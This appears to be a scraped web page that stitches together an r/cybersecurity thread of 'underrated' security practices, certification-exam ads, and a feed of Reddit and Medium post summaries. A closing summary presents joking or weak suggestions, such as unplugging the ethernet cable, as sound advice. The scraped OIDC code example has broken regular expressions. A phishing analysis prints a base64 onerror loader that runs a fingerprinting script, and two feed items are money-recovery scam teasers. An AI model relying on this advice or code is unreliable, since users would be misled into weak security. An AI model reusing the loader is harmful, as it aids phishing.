We write down all the passwords to our most secure systems – but then we rip them in half and put them in 2 separate safes.
Did I say passwords? I meant encryption keys.
4- Changing default ports for certain services like dbs
Most of the gangs out there use tools that don’t do a full search, so they go through the default port list
5- MFA in general.
Takes 60 seconds to set up, and an additional 5s each time you use it, but can save you hours if not days of manual recovery efforts with support to regain access to a compromised account. Yet people don’t like the idea.
If you are using TOTP for your MFA, you can even put it right in the browser with a plug-in. I use this approach for work. It’s very convenient.
If you use a password manager that supports TOTP and auto type (e.g. KeePassXC) then you don’t even need to mess with it once you have it set up.
6- Oauth for 3rd party apps.
Those “sign into our app with your (Google, Microsoft, etc) account” things. As long as you trust the ID provider and the app, it’s usually secure. More so, considering it prevents password reuse, and you aren’t exposed if any of those 3rd party apps have a breach.
AI- Powered Jobs Interview Warmup For Job Seekers

⚽️Comparative Analysis: Top Calgary Amateur Soccer Clubs – Outdoor 2025 Season (Kids' Programs by Age Group)
7- Two-step verification.
Yes it’s annoying to need two devices every time you want to log into your most precious accounts, but trust me, I’d rather take the extra 10 seconds to authorize a login than go through the hell of having my account breached.
8-Biometric Authentication.
The argument is that ‘you can’t change your face/finger’ but it is actually more secure than other ‘magic link’ providers.
Set yourself up for promotion or get a better job by Acing the AWS Certified Data Engineer Associate Exam (DEA-C01) with the eBook or App below (Data and AI)

Download the Ace AWS DEA-C01 Exam App:
iOS - Android
AI Dashboard is available on the Web, Apple, Google, and Microsoft, PRO version
Let me be clear, there are some providers that are still iffy on security. But there are also some that have device native authentication (you need the device to auth), they don’t store passwords or password hashes, and only has public keys.
One example of this is https://passage.id/ which is about as secure as you can get.
Invest in your future today by enrolling in this Azure Fundamentals - Pass the Azure Fundamentals Exam with Ease: Master the AZ-900 Certification with the Comprehensive Exam Preparation Guide!
- AWS Certified AI Practitioner (AIF-C01): Conquer the AWS Certified AI Practitioner exam with our AI and Machine Learning For Dummies test prep. Master fundamental AI concepts, AWS AI services, and ethical considerations.
- Azure AI Fundamentals: Ace the Azure AI Fundamentals exam with our comprehensive test prep. Learn the basics of AI, Azure AI services, and their applications.
- Google Cloud Professional Machine Learning Engineer: Nail the Google Professional Machine Learning Engineer exam with our expert-designed test prep. Deepen your understanding of ML algorithms, models, and deployment strategies.
- AWS Certified Machine Learning Specialty: Dominate the AWS Certified Machine Learning Specialty exam with our targeted test prep. Master advanced ML techniques, AWS ML services, and practical applications.
- AWS Certified Data Engineer Associate (DEA-C01): Set yourself up for promotion, get a better job or Increase your salary by Acing the AWS DEA-C01 Certification.
9- Zoom.
Yes, they had a bunch of issues at the start, but they fixed them. I would much rather work with a company that had security assessments and fixed the problems rather than a company which has never been assessed.
10- Unplugging the ethernet cable.
11- Browser password managers?
Rant moment: reasons cybersecurity fails
<Rant>
People don’t see value of putting effort in cybersecurity because they don’t see any material gains from it. The best thing they can see is nothing bad happening.
No news isn’t good enough of a good news. This is enough to mostly ignore all cybersecurity advice altogether.
This is similar to people not taking care of themselves health-wise, because the best things they can see is not getting sick.
</Rant>
Why do cyber attackers commonly use social engineering attacks?
Hackers commonly use social engineering attacks because they can be very effective. By using social engineering, hackers can take advantage of people’s trusting nature and willingness to help others. They can also exploit the fact that people are often not well-informed about security and privacy issues. For example, a hacker might pose as a customer service representative and ask for someone’s password. Or, they might send an email that looks like it is from a trusted source, such as a bank or government agency, and ask the recipient to click on a link or download an attachment. If the person falls for the deception, the hacker can gain access to their accounts or infect their computer with malware. That is why it is important to be aware of these types of attacks and know how to protect yourself.
Cyber attackers commonly use social engineering attacks for a number of reasons. First, hacking into a person’s or organization’s computer systems is becoming increasingly difficult as security measures become more sophisticated. Second, even if a hacker is able to gain access to a system, they are likely to be discovered and caught before they can do any significant damage. Third, social engineering attacks allow hackers to bypass security measures and obtain sensitive information without being detected. Finally, social media platforms have made it easier for cyber attackers to obtain personal information about their targets and to carry out attacks. As a result, social engineering attacks are an attractive option for many cyber attackers.
To conclude:
Cybersecurity is often thought of as a complex and technical field, but there are actually many simple things that everyone can do to help stay safe online. For example, one way to protect your online communications is to use PGP encryption. This type of encryption is incredibly difficult for even the most skilled hacker to break, but it’s also easy to use. Another way to improve your cybersecurity is to use very long passwords that are actually a sentence. This may seem daunting, but using a phrase as your password makes it much harder for hackers to guess. Additionally, changing the default ports for certain services can help prevent unauthorized access. And finally, unplugging the ethernet cable when you’re not using it is a great way to physically block hackers from accessing your device. By following these simple tips, you can dramatically improve your cybersecurity and protect your privacy.
source: r/cybersecurity
Source: r/cybersecurity
- Tired of massive OSINT lists, so I built a tiny Chrome extension I actually useby /u/Senior_Guidance_9508 (cybersecurity) on April 24, 2025 at 2:41 am
I kept getting overwhelmed by massive OSINT lists full of tools I never actually use. So I built a Chrome extension that launches user search queries across a small set of common platforms — grouped by type (social, dev, creative, etc.) and defined in a YAML file. It works with full names, partial usernames, or guesses. You type once — it opens all the relevant tabs. Saves time, and prompts pivots you'd normally skip because of effort. Pros: No backend. No tracking. No bloated UI. Just a flat launcher I use daily. Cons: UK-skewed (my context), and assumes you’re logged into most platforms. Find it on GitHub. Feedback welcome. Fork it or ignore it — it’s already more useful than 90% of my bookmarks. submitted by /u/Senior_Guidance_9508 [link] [comments]
- Cybersecurity Podcast for SMBs with actionable insights?by /u/tekybala (cybersecurity) on April 24, 2025 at 12:25 am
If there is a cybersecurity podcast focusing SMBs with actionable insights, recommending open source and free solutions for security controls, playbook templates, tabletop exercises, would you be interested to listen? submitted by /u/tekybala [link] [comments]
- Is this just how blue teams work or is this a red flag environment?by /u/National-Serve-5041 (cybersecurity) on April 23, 2025 at 11:38 pm
I'm in a junior security role (intern level), and I’ve been questioning whether what I’m seeing is just normal growing pains in SOC life—or signs of a low-maturity, stagnant team. I'd love to hear what others think or what you've experienced at different orgs. Things that feel off to me: Alerting & Detection Logic A lot of our detections are straight from vendor blogs or community GitHub pages, slapped into the SIEM without much thought. When they’re noisy, the fix is usually to just tack on string exclusions instead of understanding the source of the noise. We end up with brittle, bloated queries that kind of work, but aren’t explainable or maintainable. No one ever really walks through the detection logic like “this is what this alert is trying to catch and why.” Overreliance on Public Hash Reputation There’s a habit of deciding whether a file is malicious just by checking its hash against public threat intel tools. If the hash comes out clean, that’s the end of the investigation—even if the file itself is something that obviously warrants deeper inspection. I’ve seen exclusions get added just because a hash had no flags, without understanding what the file actually does. For example a mingw32 compiler binary with a note saying "Hash checks come clean" like duh. Weak EDR Usage & Case Management Our EDR tool is decent, but it’s treated like a black box that runs itself. Cases get closed with a one-liner pasted from a .txt file, no assigned severity, no triage notes, no tagging. The case states are barely used—it just goes from “unresolved” to “resolved,” skipping the whole investigation phase. It feels like we’re just going through the motions. Strange Detection Philosophy There's a focus on detecting strings, filenames, or task names seen in prior malware samples instead of focusing on how an action was done. Example: scheduled tasks are flagged based on name lists, not behavior. When I brought up ideas like looking for schtasks being spawned by odd parent processes or in strange directories, it was kind of nodded at—but then dropped. No Real Engineering or Automation This one might bug me the most. There’s very little scripting or tooling being built internally. Everything is done manually—even repeatable tasks. I’ve dreamed of working on a team where people are like “Hey, I saw you struggling with that—here’s a script I made to do that in one line.” But here, no one builds that. No internal helpers. No automation to speak of, even for simple stuff like case note templates, IOC enrichment, or sandboxing integrations. 6. Lack of Curiosity / Deep Dive Culture When I try to bring up deeper concepts—like file header tampering, non-static indicators, or real-world evasions—I feel like I’m being seen as the “paranoid intern” who read too many threat reports. There’s little interest in reverse engineering or maldev techniques unless it’s something the vendor already wrote a blog post on. What I'm wondering: Is this kind of team environment common? How do I avoid landing in places like this in the future? Are there red flags I can watch for during interviews? Am I expecting too much from blue teams? I thought we were supposed to dig deep, build tools, and iterate on detections—not just patch alerts with string filters. Would love to hear from anyone who's seen both low and high-maturity SOCs—what does a good one feel like? submitted by /u/National-Serve-5041 [link] [comments]
- New Scanner Tool for AI Code Editorsby /u/AlternativeQuick4888 (cybersecurity) on April 23, 2025 at 11:33 pm
Built a static scanner that combines a bunch of open source tools and produces a file for AI Code Editors/IDEs to easily read. I'd love some feedback from the community! https://github.com/AdarshB7/patcha-engine I think a tool like this can help a lot of people and am actively refining it to do so. Any help on the journey would be greatly appreciated. submitted by /u/AlternativeQuick4888 [link] [comments]
- Looking for honest feedback from cybersecurity pros: Early access to a European-built exposure discovery toolby /u/Mattpeeters (cybersecurity) on April 23, 2025 at 10:35 pm
Hi all, I’m a founder (based in Europe) working on a new project to help organizations identify what assets — domains, cloud services, servers, etc.— are unintentionally exposed online. The tool is designed to be much simpler and more accessible than most enterprise solutions, with a focus on smaller teams and companies. I’m at the stage where real-world feedback is much more valuable than coding in a vacuum. If you work in IT, security or just enjoy testing new tools, I’d love to invite you to try it out and share your honest thoughts. No pitch, no spam, just actual user feedback to help shape the product. If this sounds interesting, please DM me and I’ll share early access details. Thanks a lot — and if this kind of post isn’t allowed, let me know and I’ll take it down. submitted by /u/Mattpeeters [link] [comments]
- Securing Legacy Systems and Protocolsby /u/FluffyDontNut (cybersecurity) on April 23, 2025 at 9:20 pm
For those who have or are working in environments that have legacy systems or protocols (NetBios, SMB1, etc), what use cases do you have in place to detect suspicious activity? Or what would you recommend putting into place if the environment can't be cleaned up? submitted by /u/FluffyDontNut [link] [comments]
- Google has confirmed a sophisticated phishing attackby /u/Positive-Share-8742 (cybersecurity) on April 23, 2025 at 8:17 pm
https://www.dailymail.co.uk/sciencetech/article-14631849/warning-google-gmail-users-attack-personal-information.html submitted by /u/Positive-Share-8742 [link] [comments]
- As told be a CISO - how an AI SOC solution actually augments/uplevels entry level analystsby /u/ProphetSecurity (cybersecurity) on April 23, 2025 at 6:34 pm
I know Redditors don't like vendor pitches disguised as helpful content. Don't want to promote anything in particular besides a single message. Skip to 2:23-mark to hear a CISO who has every reason to cut costs through AI (in the home building industry at a time where buying/remodeling homes has taken a big hit) talk about how he's using an AI SOC tool to do the opposite, hire and train an employee https://youtu.be/Kftlx75EThc?si=hWcJcX2Ii8CQRsqc&t=144 Only time will tell the full impact of AI, but at least if humans continue to use AI responsibly, good things can happen edit: "by a CISO" [facepalm] submitted by /u/ProphetSecurity [link] [comments]
- Here’s how i recover my money from Iceriverby Thompson (Cybersecurity on Medium) on April 23, 2025 at 5:05 pm
Click here for more info on how to get your money back from Iceriver scam Continue reading on Medium »
- Verizon's 2025 DBIR is out!by /u/ticats88 (cybersecurity) on April 23, 2025 at 5:04 pm
I know it's a corporate report & all, but I still look forward to this every year. It's got a huge scope of data breaches underlying it that leads to some interesting findings. I really like the industry specific breakdowns as well. Hope this is of some use to y'all. Take care 🙂 submitted by /u/ticats88 [link] [comments]
- Quorantine: The Digital Danger Zoneby Paul Thomas (Cybersecurity on Medium) on April 23, 2025 at 5:01 pm
Have you ever imagined your entire identity — your name, your birthday, your home address — typed out and posted online like a blog entry…Continue reading on Medium »
- Cryptography:by Saikiran N (Cybersecurity on Medium) on April 23, 2025 at 5:00 pm
Cryptography is the science of securing information, ensuring that data remains confidential, unaltered, and authentic.Continue reading on Medium »
- Cryptography:by Saikiran N (Security on Medium) on April 23, 2025 at 5:00 pm
Cryptography is the science of securing information, ensuring that data remains confidential, unaltered, and authentic.Continue reading on Medium »
- "I am thrilled to announce that I have successfully completed my first AICWSA (Armour Infosec…by Aman patel (Cybersecurity on Medium) on April 23, 2025 at 4:59 pm
Continue reading on Medium »
- How It Feels When Your Script Actually Works on First Tryby Vijay Kumar Gupta (Cybersecurity on Medium) on April 23, 2025 at 4:57 pm
Prologue: The Eternal Struggle of the Cyber KnightContinue reading on Medium »
- STRIDE: Tehdit Modelleme ve Güvenli Uygulama Kılavuzuby Musa ATALAY (Cybersecurity on Medium) on April 23, 2025 at 4:56 pm
Tehdit modelleme, genellikle yalnızca güvenlik uzmanlarına özgü karmaşık bir uygulama olarak görülür. Ancak bu algı yanıltıcıdır. Tehdit…Continue reading on Medium »
- Don’t Just Disconnect — Why Signing Out of Servers Mattersby Josiah Coffey (Security on Medium) on April 23, 2025 at 4:52 pm
If you work in IT or manage infrastructure, you’ve probably done this before: you’re finished working on a server via Remote Desktop, so…Continue reading on Medium »
- What can I do to recover my money from Bitgity ?by James (Cybersecurity on Medium) on April 23, 2025 at 4:50 pm
Scam platform, click here for more information Continue reading on Medium »
- How does OIDC work: ELI5by /u/trolleid (cybersecurity) on April 23, 2025 at 4:49 pm
Similar to my last post, I was reading a lot about OIDC and created this explanation. It's a mix of the best resources I have found with some additions and a lot of rewriting. I have added a super short summary and a code example at the end. Maybe it helps one of you 🙂 This is the repo. OIDC Explained Let's say John is on LinkedIn and clicks 'Login with Google'. He is now logged in without that LinkedIn knows his password or any other sensitive data. Great! But how did that work? Via OpenID Connect (OIDC). This protocol builds on OAuth 2.0 and is the answer to above question. I will provide a super short and simple summary, a more detailed one and even a code snippet. You should know what OAuth and JWTs are because OIDC builds on them. If you're not familiar with OAuth, see my other guide here. Super Short Summary John clicks 'Login with Google' Now the usual OAuth process takes place John authorizes us to get data about his Google profile E.g. his email, profile picture, name and user id Important: Now Google not only sends LinkedIn the access token as specified in OAuth, but also a JWT. LinkedIn uses the JWT for authentication in the usual way E.g. John's browser saves the JWT in the cookies and sends it along every request he makes LinkedIn receives the token, verifies it, and sees "ah, this is indeed John" More Detailed Summary Suppose LinkedIn wants users to log in with their Google account to authenticate and retrieve profile info (e.g., name, email). LinkedIn sets up a Google API account and receives a client_id and a client_secret So Google knows this client id is LinkedIn John clicks 'Log in with Google' on LinkedIn. LinkedIn redirects to Google’s OIDC authorization endpoint: https://accounts.google.com/o/oauth2/auth?client_id=...&redirect_uri=...&scope=openid%20profile%20email&response_type=code As you see, LinkedIn passes client_id, redirect_id, scope and response_type as URL params Important: scope must include openid profile and email are optional but commonly used redirect_uri is where Google sends the response. John logs into Google Google asks: 'LinkedIn wants to access your Google Account', John clicks 'Allow' Google redirects to the specified redirect_uri with a one-time authorization code. For example: https://linkedin.com/oidc/callback?code=one_time_code_xyz LinkedIn makes a server-to-server request to Google It passes the one-time code, client_id, and client_secret in the request body Google responds with an access token and a JWT Finished. LinkedIn now uses the JWT for authentication and can use the access token to get more info about John's Google account Question: Why not already send the JWT and access token in step 6? Answer: To make sure that the requester is actually LinkedIn. So far, all requests to Google have come from the user's browser, with only the client_id identifying LinkedIn. Since the client_id isn't secret and could be guessed by an attacker, Google can't know for sure that it's actually LinkedIn behind this. Authorization servers (Google in this example) use predefined URIs. So LinkedIn needs to specify predefined URIs when setting up their Google API. And if the given redirect_uri is not among the predefined ones, then Google rejects the request. See here: https://datatracker.ietf.org/doc/html/rfc6749#section-3.1.2.2 Additionally, LinkedIn includes the client_secret in the server-to-server request. This, however, is mainly intended to protect against the case that somehow intercepted the one time code, so he can't use it. Addendum In step 8 LinkedIn also verifies the JWT's signature and claims. Usually in OIDC we use asymmetric encryption (Google does for example) to sign the JWT. The advantage of asymmetric encryption is that the JWT can be verified by anyone by using the public key, including LinkedIn. Ideally, Google also returns a refresh token. The JWT will work as long as it's valid, for example hasn't expired. After that, the user will need to redo the above process. The public keys are usually specified at the JSON Web Key Sets (JWKS) endpoint. Key Additions to OAuth 2.0 As we saw, OIDC extends OAuth 2.0. This guide is incomplete, so here are just a few of the additions that I consider key additions. ID Token The ID token is the JWT. It contains user identity data (e.g., sub for user ID, name, email). It's signed by the IdP (Identity provider, in our case Google) and verified by the client (in our case LinkedIn). The JWT is used for authentication. Hence, while OAuth is for authorization, OIDC is authentication. Don't confuse Access Token and ID Token: Access Token: Used to call Google APIs (e.g. to get more info about the user) ID Token: Used purely for authentication (so we know the user actually is John) Discovery Document OIDC providers like Google publish a JSON configuration at a standard URL: https://accounts.google.com/.well-known/openid-configuration This lists endpoints (e.g., authorization, token, UserInfo, JWKS) and supported features (e.g., scopes). LinkedIn can fetch this dynamically to set up OIDC without hardcoding URLs. UserInfo Endpoint OIDC standardizes a UserInfo endpoint (e.g., https://openidconnect.googleapis.com/v1/userinfo). LinkedIn can use the access token to fetch additional user data (e.g., name, picture), ensuring consistency across providers. Nonce To prevent replay attacks, LinkedIn includes a random nonce in the authorization request. Google embeds it in the ID token, and LinkedIn checks it matches during verification. Security Notes HTTPS: OIDC requires HTTPS for secure token transmission. State Parameter: Inherited from OAuth 2.0, it prevents CSRF attacks. JWT Verification: LinkedIn must validate JWT claims (e.g., iss, aud, exp, nonce) to ensure security. Code Example Below is a standalone Node.js example using Express to handle OIDC login with Google, storing user data in a SQLite database. Please note that this is just example code and some things are missing or can be improved. I also on purpose did not use the library openid-client so less things happen "behind the scenes" and the entire process is more visible. In production you would want to use openid-client or a similar library. Last note, I also don't enforce HTTPS here, which in production you really really should. ```javascript const express = require("express"); const axios = require("axios"); const sqlite3 = require("sqlite3").verbose(); const crypto = require("crypto"); const jwt = require("jsonwebtoken"); const session = require("express-session"); const jwkToPem = require("jwk-to-pem"); const app = express(); const db = new sqlite3.Database(":memory:"); // Configure session middleware app.use( session({ secret: process.env.SESSION_SECRET || "oidc-example-secret", resave: false, saveUninitialized: true, }) ); // Initialize database db.serialize(() => { db.run( "CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT, email TEXT)" ); db.run( "CREATE TABLE federated_credentials (user_id INTEGER, provider TEXT, subject TEXT, PRIMARY KEY (provider, subject))" ); }); // Configuration const CLIENT_ID = process.env.OIDC_CLIENT_ID; const CLIENT_SECRET = process.env.OIDC_CLIENT_SECRET; const REDIRECT_URI = "https://example.com/oidc/callback"; const ISSUER_URL = "https://accounts.google.com"; // OIDC discovery endpoints cache let oidcConfig = null; // Function to fetch OIDC configuration from the discovery endpoint async function fetchOIDCConfiguration() { if (oidcConfig) return oidcConfig; try { const response = await axios.get( ${ISSUER_URL}/.well-known/openid-configuration ); oidcConfig = response.data; return oidcConfig; } catch (error) { console.error("Failed to fetch OIDC configuration:", error); throw error; } } // Function to generate and verify PKCE challenge function generatePKCE() { // Generate code verifier const codeVerifier = crypto.randomBytes(32).toString("base64url"); // Generate code challenge (SHA256 hash of verifier, base64url encoded) const codeChallenge = crypto .createHash("sha256") .update(codeVerifier) .digest("base64") .replace(/+/g, "-") .replace(///g, "_") .replace(/=/g, ""); return { codeVerifier, codeChallenge }; } // Function to fetch JWKS async function fetchJWKS() { const config = await fetchOIDCConfiguration(); const response = await axios.get(config.jwks_uri); return response.data.keys; } // Function to verify ID token async function verifyIdToken(idToken) { // First, decode the header without verification to get the key ID (kid) const header = JSON.parse( Buffer.from(idToken.split(".")[0], "base64url").toString() ); // Fetch JWKS and find the correct key const jwks = await fetchJWKS(); const signingKey = jwks.find((key) => key.kid === header.kid); if (!signingKey) { throw new Error("Unable to find signing key"); } // Format key for JWT verification const publicKey = jwkToPem(signingKey); return new Promise((resolve, reject) => { jwt.verify( idToken, publicKey, { algorithms: [signingKey.alg], audience: CLIENT_ID, issuer: ISSUER_URL, }, (err, decoded) => { if (err) return reject(err); resolve(decoded); } ); }); } // OIDC login route app.get("/login", async (req, res) => { try { // Fetch OIDC configuration const config = await fetchOIDCConfiguration(); // Generate state for CSRF protection const state = crypto.randomBytes(16).toString("hex"); req.session.state = state; // Generate nonce for replay protection const nonce = crypto.randomBytes(16).toString("hex"); req.session.nonce = nonce; // Generate PKCE code verifier and challenge const { codeVerifier, codeChallenge } = generatePKCE(); req.session.codeVerifier = codeVerifier; // Build authorization URL const authUrl = new URL(config.authorization_endpoint); authUrl.searchParams.append("client_id", CLIENT_ID); authUrl.searchParams.append("redirect_uri", REDIRECT_URI); authUrl.searchParams.append("response_type", "code"); authUrl.searchParams.append("scope", "openid profile email"); authUrl.searchParams.append("state", state); authUrl.searchParams.append("nonce", nonce); authUrl.searchParams.append("code_challenge", codeChallenge); authUrl.searchParams.append("code_challenge_method", "S256"); res.redirect(authUrl.toString()); } catch (error) { console.error("Login initialization error:", error); res.status(500).send("Failed to initialize login"); } }); // OIDC callback route app.get("/oidc/callback", async (req, res) => { const { code, state } = req.query; const { codeVerifier, state: storedState, nonce: storedNonce } = req.session; // Verify state if (state !== storedState) { return res.status(403).send("Invalid state parameter"); } try { // Fetch OIDC configuration const config = await fetchOIDCConfiguration(); // Exchange code for tokens const tokenResponse = await axios.post( config.token_endpoint, new URLSearchParams({ grant_type: "authorization_code", client_id: CLIENT_ID, client_secret: CLIENT_SECRET, code, redirect_uri: REDIRECT_URI, code_verifier: codeVerifier, }), { headers: { "Content-Type": "application/x-www-form-urlencoded", }, } ); const { id_token, access_token } = tokenResponse.data; // Verify ID token const claims = await verifyIdToken(id_token); // Verify nonce if (claims.nonce !== storedNonce) { return res.status(403).send("Invalid nonce"); } // Extract user info from ID token const { sub: subject, name, email } = claims; // If we need more user info, we can fetch it from the userinfo endpoint // const userInfoResponse = await axios.get(config.userinfo_endpoint, { // headers: { Authorization: `Bearer ${access_token}` } // }); // const userInfo = userInfoResponse.data; // Check if user exists in federated_credentials db.get( "SELECT * FROM federated_credentials WHERE provider = ? AND subject = ?", [ISSUER_URL, subject], (err, cred) => { if (err) return res.status(500).send("Database error"); if (!cred) { // New user: create account db.run( "INSERT INTO users (name, email) VALUES (?, ?)", [name, email], function (err) { if (err) return res.status(500).send("Database error"); const userId = this.lastID; db.run( "INSERT INTO federated_credentials (user_id, provider, subject) VALUES (?, ?, ?)", [userId, ISSUER_URL, subject], (err) => { if (err) return res.status(500).send("Database error"); // Store user info in session req.session.user = { id: userId, name, email }; res.send(`Logged in as ${name} (${email})`); } ); } ); } else { // Existing user: fetch and log in db.get( "SELECT * FROM users WHERE id = ?", [cred.user_id], (err, user) => { if (err || !user) return res.status(500).send("Database error"); // Store user info in session req.session.user = { id: user.id, name: user.name, email: user.email, }; res.send(`Logged in as ${user.name} (${user.email})`); } ); } } ); } catch (error) { console.error("OIDC callback error:", error); res.status(500).send("OIDC authentication error"); } }); // User info endpoint (requires authentication) app.get("/userinfo", (req, res) => { if (!req.session.user) { return res.status(401).send("Not authenticated"); } res.json(req.session.user); }); // Logout endpoint app.get("/logout", async (req, res) => { try { // Fetch OIDC configuration to get end session endpoint const config = await fetchOIDCConfiguration(); let logoutUrl; if (config.end_session_endpoint) { logoutUrl = new URL(config.end_session_endpoint); logoutUrl.searchParams.append("client_id", CLIENT_ID); logoutUrl.searchParams.append( "post_logout_redirect_uri", "https://example.com" ); } // Clear the session req.session.destroy(() => { if (logoutUrl) { res.redirect(logoutUrl.toString()); } else { res.redirect("/"); } }); } catch (error) { console.error("Logout error:", error); // Even if there's an error fetching the config, // still clear the session and redirect req.session.destroy(() => { res.redirect("/"); }); } }); app.listen(3000, () => console.log("Server running on port 3000")); ``` License MIT submitted by /u/trolleid [link] [comments]
- Cybersecurity for Seniors: Navigating the Internet with Confidenceby E. Ibrahimi (Cybersecurity on Medium) on April 23, 2025 at 4:48 pm
An Easy-to-Follow Guide to Online SecurityContinue reading on MeetCyber »
- Defending AI on Oracle Cloud Infrastructure: A Technical Incident Response Playbook Using Oracle…by Scarlett Danger (Cybersecurity on Medium) on April 23, 2025 at 4:41 pm
AI workloads on Oracle Cloud Infrastructure (OCI) are increasingly targeted by sophisticated attacks such as prompt injection, model…Continue reading on Medium »
- Wireshark: The Basics | THMby Isiah Johnstone (Cybersecurity on Medium) on April 23, 2025 at 4:35 pm
This is a walkthrough of Wireshark: The Basics from TryHackMeContinue reading on Medium »
- WhatsApp for Windows flaw (CVE-2025-30401) allowed remote code execution via spoofed filesby /u/bytelocksolutions (cybersecurity) on April 23, 2025 at 4:11 pm
Meta recently patched a high-severity vulnerability in WhatsApp for Windows (CVE-2025-30401) that allowed attackers to execute malicious code on a target’s machine by sending spoofed file types. The exploit didn’t require the user to do anything beyond opening what looked like a harmless file. This makes it particularly dangerous for less tech-savvy users and internal teams not trained in threat detection. What is known: - Affected all WhatsApp for Windows versions prior to 2.2450.6 - Exploited using specially crafted files with manipulated extensions - Meta confirmed active exploitation before the patch was issued It’s a reminder that even popular desktop apps can become threat vectors when spoofing and user trust intersect. Were you or someone you know affected by this? Or have you seen this exploited in the wild in an org you work with? submitted by /u/bytelocksolutions [link] [comments]
- Enforcing DB Level Multi-Tenancy Using PostgreSQL Row Level Securityby Muhammed Said Kaya (Security on Medium) on April 23, 2025 at 3:42 pm
Multi-tenancy is a core requirement in SAAS applications. Each customer (tenant) should only access their own data — and the best way to…Continue reading on Picus Security Engineering »
- Shifting Priorities: The Rise of Securitized Development in International Aidby Şule Ekinci (Security on Medium) on April 23, 2025 at 3:35 pm
“We will not enjoy security without development, we will not enjoy development without security, and we will not enjoy without respect for…Continue reading on Medium »
- AI Agents: AresGPT + Topical Authority Advisor’s Red Teaming Intelligence SEOby Adam M. Victor | Author | A.I. Ethics (Security on Medium) on April 23, 2025 at 3:35 pm
The Rise of Ethical AI Intelligence in Digital StrategyContinue reading on Medium »
- Phishing-Style Link Reflected on Microsoft Azure Portal — Not XSS, But Still Trickyby Ahmed AbdElmaqsoud (Security on Medium) on April 23, 2025 at 2:54 pm
🧭 A Quick BackgroundContinue reading on Medium »
- Top 10 Ways to Protect Your MERN Application Like a Proby Shanmuga priya (Security on Medium) on April 23, 2025 at 2:51 pm
A comprehensive beginner-friendly guide on securing the MERN apps from vulnerabilities and attacksContinue reading on Code Like A Girl »
- Anyone actually efficiently managing all the appsec issues coming via the pipelines?by /u/Major_Ideal1453 (cybersecurity) on April 23, 2025 at 2:44 pm
There’s so much noise from SAST, DAST, SCA, bug bounty, etc. Is anyone actually aggregating it all somewhere useful? Or are we all still stuck in spreadsheets and Jira hell? What actually works for your team (or doesn’t)? Curious to hear what setups people have landed on. submitted by /u/Major_Ideal1453 [link] [comments]
- Pipask: Know What You’re Installing Before It’s Too Lateby Jan Michelfeit (Security on Medium) on April 23, 2025 at 2:41 pm
A safer way to install Python packages without compromising convenience (or losing your Bitcoin)Continue reading on Data Science Collective »
- Michael Yonesi shares his Top 5 Cybersecurity Tips You Can’t Afford to Ignoreby Michael Younsi (Security on Medium) on April 23, 2025 at 2:05 pm
In a digital era dominated by rapid innovation, cybersecurity isn’t just a best practice — it’s survival. Michael Yonesi, a cybersecurity…Continue reading on Medium »
- MCP: Yapay Zekâların USB-C’si mi, Yoksa Yeni Bir Güvenlik Kabusu mu?by yiğit faruk demir (Security on Medium) on April 23, 2025 at 1:45 pm
Yapay zekâ dünyasında şu sıralar en çok konuşulan konulardan biri: Anthropic’in geliştirdiği Model Context Protocol (MCP). Bu yeni…Continue reading on Medium »
- MFA Authentication method added for multiple accountsby /u/Yae-ger (cybersecurity) on April 23, 2025 at 1:42 pm
Hey folks, A few days back, I observed something odd at work and wondered if anyone (especially MSFT/Entra ID experts) could help me figure it out because our IAM SME was lost. Our MDR sent an alert about a Suspicious email addition to one of our accounts. Seconds later, they let us know that the same email address was added to 500 different accounts as an MFA email authentication method, which makes me believe someone is looking for persistence in our environment. The email address added does not belong to our domain, and of course, no one recognizes it. The audit logs say the email address was added by "Azure Credential Configuration Endpoint Service," which, from the few things I read on the internet, seems a legitimate MSFT service. I believe this was done leveraging a misconfiguration in our environment, abusing a legitimate service but I'm not sure which one or where to look. I feel that Conditional Access Policies (CAP) might help here but I'm wondering where's the hole that I need to patch to prevent this. Any help will be duly appreciated. submitted by /u/Yae-ger [link] [comments]
- Released: MITRE ATT&CK v17.0, now with ESXi attack TTPsby /u/tekz (cybersecurity) on April 23, 2025 at 1:06 pm
submitted by /u/tekz [link] [comments]
- Fingerprinted & Matched: How Tycoon2FA Phishing Chooses Its Victimsby /u/ANYRUN-team (cybersecurity) on April 23, 2025 at 11:41 am
This phishing technique uses system fingerprinting and geolocation to selectively deliver malicious content. In this case, the phishing page loads only for victims in Argentina, Brazil, and Middle East, as observed during analysis in ANYRUN Sandbox. Execution chain: HTML → Hidden IMG → data-digest → OnError → B64 decode → 𝗙𝗶𝗻𝗴𝗲𝗿𝗽𝗿𝗶𝗻𝘁 → POST → Geolocation match → Conditional redirect (non-matching users sent to Tesla or Emirates) → Tycoon2FA Here’s how it works: New domains registered via “Squarespace Domains” and hosted on ASN “AS-CHOOPA”. When visited, these domains immediately forward the user to well-known sites like Tesla, Emirates or SpaceX. Analysis: https://app.any.run/browses/d9b4ca48-5226-43c1-8232-40d51d37ec8e/ Right before a redirect, a hidden “img” tag is injected. Because the image doesn't exist, the onerror event is triggered: onerror="(new Function(atob(this.dataset.digest)))();" The event runs a fingerprinting script that collects: – Screen resolution, color depth, etс. – User agent, platform details, plugins – User’s local timezone offset – GPU vendor and renderer via WebGL A fingerprinting script in 